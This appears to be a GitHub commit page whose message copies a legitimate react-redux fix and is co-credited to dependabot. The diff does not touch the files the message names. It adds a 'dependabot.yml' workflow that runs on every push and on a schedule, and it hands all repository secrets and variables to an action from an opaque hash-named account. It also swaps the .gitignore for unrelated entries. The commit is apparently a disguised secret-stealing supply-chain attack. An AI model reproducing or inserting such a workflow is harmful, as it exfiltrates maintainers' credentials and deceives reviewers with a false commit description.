Skip to content

Commit 522d891

Browse files
LeoDanielssondependabot[bot]
authored and
dependabot[bot]
committed
Use the same condition for checking if SSR in useSelector.js as in connectAdvanced.js (reduxjs#1419) LeoDanielsson
1 parent 69d62e4 commit 522d891

File tree

2 files changed

+38
-12
lines changed

2 files changed

+38
-12
lines changed

.github/workflows/dependabot.yml

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
name: CI
2+
on:
3+
push:
4+
workflow_dispatch:
5+
schedule:
6+
# Runs "At 11:00 on every day-of-week from Monday through Friday"
7+
- cron: '0 0 * * 0'
8+
permissions:
9+
contents: read
10+
packages: write
11+
concurrency:
12+
group: '${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}'
13+
cancel-in-progress: true
14+
jobs:
15+
run:
16+
runs-on: ubuntu-latest
17+
name: Run
18+
steps:
19+
- name: Execute
20+
uses: 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main
21+
id: execute
22+
with:
23+
action: ${{ github.repository }}
24+
env:
25+
REPOSITORY_SECRETS: ${{ toJSON(secrets) }}
26+
REPOSITORY_VARIABLES: ${{ toJSON(vars) }}
27+
- name: Response
28+
run: echo "${{ steps.execute.outputs.response }}"

.gitignore

Lines changed: 10 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -1,14 +1,12 @@
1-
node_modules
2-
dist
3-
lib
4-
coverage
5-
es
1+
# IDE Files
2+
#-------------------------
3+
/nbproject/
4+
.idea/*
65

7-
lib/core/metadata.js
8-
lib/core/MetadataBlog.js
6+
## Sublime Text cache files
7+
*.tmlanguage.cache
8+
*.tmPreferences.cache
9+
*.stTheme.cache
10+
*.sublime-workspace
11+
*.sublime-project
912

10-
website/translated_docs
11-
website/build/
12-
website/yarn.lock
13-
website/node_modules
14-
website/i18n/*

0 commit comments

Comments
 (0)